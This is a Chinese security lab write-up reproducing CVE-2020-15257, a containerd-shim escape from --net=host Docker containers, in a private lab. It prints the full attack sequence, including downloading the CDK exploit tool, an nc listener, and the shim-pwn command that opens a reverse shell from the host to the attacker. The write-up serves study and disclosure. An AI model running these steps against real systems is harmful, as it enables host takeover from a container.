Docker容器逃逸漏洞复现（CVE-2020-15257） – 作者:龙渊实验室LongYuanLab

一、漏洞介绍

漏洞原理

Containerd 是一个控制 runC 的守护进程，提供命令行客户端和API，用于在一个机器上管理容器。当在docker使用–net=host参数启动，与宿主机共享net namespace时，容器中的攻击者可以绕过访问权限访问 containerd 的控制API 进而导致权限提升，从而实现Docker容器逃逸。

Containerd是行业标准的容器运行时，可作为Linux和Windows的守护程序使用。在版本1.3.9和1.4.3之前的容器中，容器填充的API不正确地暴露给主机网络容器。填充程序的API套接字的访问控制验证了连接过程的有效UID为0，但没有以其他方式限制对抽象Unix域套接字的访问。这将允许在与填充程序相同的网络名称空间中运行的恶意容器（有效UID为0，但特权降低）导致新进程以提升的特权运行。

影响版本

containerd < 1.4.3

containerd < 1.3.9

实验环境：

被攻击机（ubuntu）ip：192.168.163.129

被攻击机containerd版本：1.2.6

攻击机（kali）ip：192.168.163.131

POC下载：https://github.com/Xyntax/CDK/releases/tag/0.1.6

二、环境介绍

01

被攻击机查看docker版本，显示Containerd Version : 1.2.6

命令：docker version

02

为了区分被攻击机的真实环境和被攻击机的docker环境分别在/root目录下面创建不同文件

被攻击机的docker环境：docker环境下面的/root目录下面没有文件，为了便于区分，复制一个dockerfile文件到/root目录下

被攻击机的真实环境：真实环境下面的/root目录放置了一个true文件

三、漏洞复现

01

被攻击机真实环境中列出被攻击机的容器

命令：docker ps

02

被攻击机以共享主机网络的方式启动容器，并且直接进入了docker容器

通过 –net=host 作为启动参数来运行一个容器（此处为了方便直接选择已经存在的容器vulhub/activemq:5.11.1，但是会单独再建立了一个容器，不会再下拉镜像，但是两个容器不相关）

命令：docker run -it –net=host vulhub/activemq:5.11.1 /bin/bash

03

被攻击机真实环境中列出被攻击机的容器列表，刚刚我们新建的容器为container id : 4ad4f620e6a5

命令：docker ps

04

在被攻击机docker容器中执行命令，可看到抽象命名空间Unix域套接字

命令：cat /proc/net/unix|grep -a “containerd-shim”

原理备注：containerd->containerd-shim->runc 的通信模型中，containerd-shim的接口作为abstract unix socket暴露，在docker使用–net=host参数启动、与宿主机共享net namespace时，其中的unix socket可以被容器内部访问到，容器中攻击者通过该socket可以通过API控制下游runc进程启动新的恶意镜像，并通过该镜像逃逸。

05

为了方便查看，被攻击机的docker环境下切换到/tmp目录下面进行操作。下载对应的poc并且进行解压操作。

下载poc命令：wget https://github.com/Xyntax/CDK/releases/download/0.1.6/cdk_v0.1.6_release.tar.gz

解压poc命令：tar -zxvf cdk_v0.1.6_release.tar.gz

06

kali攻击机开启监听端口12345

命令：nc -lvp 12345

07

被攻击机的docker环境中执行命令，利用poc建立起连接

命令：./cdk_linux_386 run shim-pwn 192.168.163.131 12345

08

Kali攻击机成功获取了被攻击机真实环境的反弹shell（从/root目录下的文件可看出反弹的为真实主机的shell）

备注：

本实验存在很多注意事项（只限于本人实验过程中的坑）：

1、本来想使用vulhub的s2-032环境漏洞，利用Struts2工具远程命令执行进行docker逃逸，发现执行命令：cat /proc/net/unix|grep -a “containerd-shim”时无法看到抽象命名空间Unix域套接字，执行poc的时候显示Cannot find vulnerable socket（我使用的是docker exec -it 6970bdddacc6 /bin/bash进入的docker环境 ）

2、注意利用–net=host新建容器的时候image名字是相同的，注意区分，否则执行的命令会进入另外一个容器

3、此利用条件是完全控制了被攻击机的docker容器的环境下执行的，利用被攻击机的docker环境控制被攻击机的真实环境。

原文链接

来源：freebuf.com 2021-01-12 09:38:30 by: 龙渊实验室LongYuanLab